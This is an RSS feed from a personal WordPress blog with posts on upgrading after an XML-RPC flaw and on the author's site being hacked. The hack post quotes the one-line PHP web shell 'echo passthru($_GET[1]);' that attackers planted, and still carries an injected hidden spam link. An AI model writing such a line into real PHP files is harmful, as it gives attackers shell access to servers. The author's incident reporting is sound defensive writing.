<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Shuron's Letters&#187; security</title>
	<atom:link href="http://alexander.holbreich.org/tag/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://alexander.holbreich.org</link>
	<description>Personal blog of Alexander Holbreich</description>
	<lastBuildDate>Tue, 25 May 2010 21:46:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Back again</title>
		<link>http://alexander.holbreich.org/2008/04/back-again/</link>
		<comments>http://alexander.holbreich.org/2008/04/back-again/#comments</comments>
		<pubDate>Wed, 16 Apr 2008 21:58:47 +0000</pubDate>
		<dc:creator>shuron</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[off topic]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://alexander.holbreich.org2008/04/back-again/</guid>
		<description><![CDATA[It&#8217;s pretty difficult to start write again after such pause. My wife and my Son are away for a holidays, so I must found some time to write to my blog. But where to begin. So many thing are happened in the last time.
Ok , I know I begin with the introducing of the My [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s pretty difficult to start write again after such pause. My wife and my Son are away for a holidays, so I must found some time to write to my blog. But where to begin. So many thing are happened in the last time.</p>
<p>Ok , I know I begin with the introducing of the <a href="http://paulina.holbreich.de" title="Polja">My wife&#8217;s Blog</a>. It&#8217;s about books, travel and geography, because my darling do study at the Faculty of Geography. You might find it also interesting even when you will not find there many articles about IT <img src='http://alexander.holbreich.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  However her English is much better than my <img src='http://alexander.holbreich.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Back to this blog. As you know Wordpress 2.5 is out. And somehow there are no security updates at that time. How it comes? Did the Wordpress guys didn&#8217;t their work really good this time? <img src='http://alexander.holbreich.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />   Seems to be. So I consider to upgrade in the next time.</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;bodytext=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i" title="Digg"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;notes=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i" title="del.icio.us"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;t=Back%20again" title="Facebook"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again" title="Mixx"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;annotation=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i" title="Google Bookmarks"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;Title=Back%20again" title="BlinkList"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/blinklist.png" title="BlinkList" alt="BlinkList" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mister-wong.de/addurl/?bm_url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;bm_description=Back%20again&amp;plugin=soc" title="MisterWong.DE"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/misterwong.png" title="MisterWong.DE" alt="MisterWong.DE" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://slashdot.org/bookmark.pl?title=Back%20again&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F" title="Slashdot"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/slashdot.png" title="Slashdot" alt="Slashdot" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again" title="StumbleUpon"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F" title="Technorati"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.newsvine.com/_tools/seed&amp;save?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;h=Back%20again" title="NewsVine"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/newsvine.png" title="NewsVine" alt="NewsVine" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://reddit.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again" title="Reddit"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/reddit.png" title="Reddit" alt="Reddit" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://yigg.de/neu?exturl=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;exttitle=Back%20again" title="Yigg"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/yiggit.png" title="Yigg" alt="Yigg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://news.ycombinator.com/submitlink?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;t=Back%20again" title="HackerNews"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/hackernews.png" title="HackerNews" alt="HackerNews" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;source=Shuron%27s+Letters+Personal+blog+of+Alexander+Holbreich&amp;summary=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i" title="LinkedIn"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/linkedin.png" title="LinkedIn" alt="LinkedIn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.webnews.de/einstellen?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again" title="Webnews.de"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/webnews.png" title="Webnews.de" alt="Webnews.de" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://buzz.yahoo.com/submit/?submitUrl=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;submitHeadline=Back%20again&amp;submitSummary=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i&amp;submitCategory=science&amp;submitAssetType=text" title="Yahoo! Buzz"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/yahoobuzz.png" title="Yahoo! Buzz" alt="Yahoo! Buzz" class="sociable-hovers" /></a>


<br/><br/>]]></content:encoded>
			<wfw:commentRss>http://alexander.holbreich.org/2008/04/back-again/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wordpress 2.3.3 fixes XML-RPC bug</title>
		<link>http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/</link>
		<comments>http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 08:06:43 +0000</pubDate>
		<dc:creator>shuron</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[XML-RPC]]></category>

		<guid isPermaLink="false">http://alexander.holbreich.org2008/02/wordpress-233-fixes-xml-rpc-bug/</guid>
		<description><![CDATA[Please upgrade your Wordpress blog as sun as possible to the released version 2.3.3, because there are security reasons for it. Further check the content of your posts in the code perspective, because maybe it was changed by some intruders, which have possibly used XML-RCP Bug in the Wordpress version 2.3.2.
 &#8230; A flaw was [...]]]></description>
			<content:encoded><![CDATA[<p>Please upgrade your Wordpress blog as sun as possible to the released <a href="http://wordpress.org/development/2008/02/wordpress-233/" target="_blank">version 2.3.3</a>, because there are security reasons for it. Further check the content of your posts in the code perspective, because maybe it was changed by some intruders, which have possibly used XML-RCP Bug in the Wordpress version 2.3.2.</p>
<p><span style="font-style: italic"> &#8230; A flaw was found in our XML-RPC implementation such that a specially crafted request would allow any valid user to edit posts of any other user on that blog. &#8230;</span><br />
So e.g. I found some strange code lines in my several posts looking like:</p>
<p>&lt;noscript&gt;Furious franchise is a decision internets download nextel &lt;a( deleted href)&gt; madonna ringtones&lt;/a&gt; software and.&lt;/noscript&gt;</p>
<p>&lt;noscript&gt;Forse vi piacerebbe il software, o l&#8217;interfaccia di una particolare &lt;a( deleted href)&gt;poker&lt;/a&gt; room, o forse no.&lt;/noscript&gt;</p>
<p>I definitely have not inserted them in to my posts. So how did they get into it? They could be inserted by some Plug-in but they looks so as should be <span style="font-weight: bold">hidden </span>to my eyes, and make few sense for any plug in. Therefore my theory is that they where inserted by bad guys, that used out some of security bugs in wordpress. Presumably they may be used mentioned XML-RPC Bug in the Wordpress version 2.3.2.</p>
<p style="font-weight: bold">Please let me know if you know more about these strange lines.</p>
<p> P.S. In addition i have deleted some unknown users, because my observation point me to some the believe that this could be the violation of security to. So if you wanna subscribe to the comments or Posts, use RSS. Thank you for understanding.</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;bodytext=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav" title="Digg"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;notes=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav" title="del.icio.us"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;t=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="Facebook"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="Mixx"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;annotation=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav" title="Google Bookmarks"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;Title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="BlinkList"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/blinklist.png" title="BlinkList" alt="BlinkList" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mister-wong.de/addurl/?bm_url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;bm_description=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;plugin=soc" title="MisterWong.DE"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/misterwong.png" title="MisterWong.DE" alt="MisterWong.DE" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://slashdot.org/bookmark.pl?title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F" title="Slashdot"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/slashdot.png" title="Slashdot" alt="Slashdot" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="StumbleUpon"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F" title="Technorati"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.newsvine.com/_tools/seed&amp;save?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;h=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="NewsVine"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/newsvine.png" title="NewsVine" alt="NewsVine" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://reddit.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="Reddit"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/reddit.png" title="Reddit" alt="Reddit" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://yigg.de/neu?exturl=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;exttitle=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="Yigg"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/yiggit.png" title="Yigg" alt="Yigg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://news.ycombinator.com/submitlink?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;t=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="HackerNews"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/hackernews.png" title="HackerNews" alt="HackerNews" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;source=Shuron%27s+Letters+Personal+blog+of+Alexander+Holbreich&amp;summary=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav" title="LinkedIn"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/linkedin.png" title="LinkedIn" alt="LinkedIn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.webnews.de/einstellen?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20" title="Webnews.de"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/webnews.png" title="Webnews.de" alt="Webnews.de" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://buzz.yahoo.com/submit/?submitUrl=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;submitHeadline=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;submitSummary=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav&amp;submitCategory=science&amp;submitAssetType=text" title="Yahoo! Buzz"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/yahoobuzz.png" title="Yahoo! Buzz" alt="Yahoo! Buzz" class="sociable-hovers" /></a>


<br/><br/>]]></content:encoded>
			<wfw:commentRss>http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>I was hacked, thank open source</title>
		<link>http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/</link>
		<comments>http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/#comments</comments>
		<pubDate>Fri, 13 Jul 2007 14:50:02 +0000</pubDate>
		<dc:creator>shuron</dc:creator>
				<category><![CDATA[CMS]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://alexander.holbreich.org2007/07/i-was-hacked-thank-open-source/</guid>
		<description><![CDATA[Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attackers uses some exploit in wordpress or some plug in or maybe of k2 theme. Some malfunction of these open source components was used out, so that attacker have added lines like
echo passthru($_GET[1]);
to some of [...]]]></description>
			<content:encoded><![CDATA[<p>Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attackers uses some exploit in wordpress or some plug in or maybe of k2 theme. Some malfunction of these open source components was used out, so that attacker have added lines like</p>
<p><em>echo passthru($_GET[1]);</em></p>
<p>to some of php files. That gives them access to shell of my user account on this server. Bad thing it that other domains of mine where affected too. The &#8220;Forbidden&#8221; you probably have seen, was initiated by my server administrator to prevent broadening<noscript>&amp;lt;a href=&#8221;http://www.flintgraphics.com&#8221; mce_href=&#8221;http://www.flintgraphics.com&#8221;&amp;gt;free ringtones&amp;lt;/a&amp;gt; for 1 minute.</noscript> of the attack.</p>
<p>I could not find the exactly place of the initial exploit yet. But attackers have left many of traces. So that I was able to reconstruct the rest and remove backdoors. This was a new experience, especially I learned in seconds, that it is better to separate my popular projects from insecure open source playgrounds, like this site actually is.</p>
<p>And on holbreich .de i turned all possible security mechanisms on, till final clarification is done. So you can&#8217;t leave comments at the moment cause we are still under carnitine!</p>
<p>P.S. That hackers left some strange move on one of my domains for download to use out the traffic and space. Some was some strange comedy about two gay man. It was in some strange language, so I could not laugh <img src='http://alexander.holbreich.org/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>



Share and Enjoy:


	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;bodytext=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20" title="Digg"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;notes=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20" title="del.icio.us"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;t=I%20was%20hacked%2C%20thank%20open%20source" title="Facebook"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source" title="Mixx"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;annotation=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20" title="Google Bookmarks"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;Title=I%20was%20hacked%2C%20thank%20open%20source" title="BlinkList"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/blinklist.png" title="BlinkList" alt="BlinkList" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mister-wong.de/addurl/?bm_url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;bm_description=I%20was%20hacked%2C%20thank%20open%20source&amp;plugin=soc" title="MisterWong.DE"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/misterwong.png" title="MisterWong.DE" alt="MisterWong.DE" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://slashdot.org/bookmark.pl?title=I%20was%20hacked%2C%20thank%20open%20source&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F" title="Slashdot"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/slashdot.png" title="Slashdot" alt="Slashdot" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source" title="StumbleUpon"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F" title="Technorati"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.newsvine.com/_tools/seed&amp;save?u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;h=I%20was%20hacked%2C%20thank%20open%20source" title="NewsVine"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/newsvine.png" title="NewsVine" alt="NewsVine" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://reddit.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source" title="Reddit"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/reddit.png" title="Reddit" alt="Reddit" class="sociable-hovers" /></a>
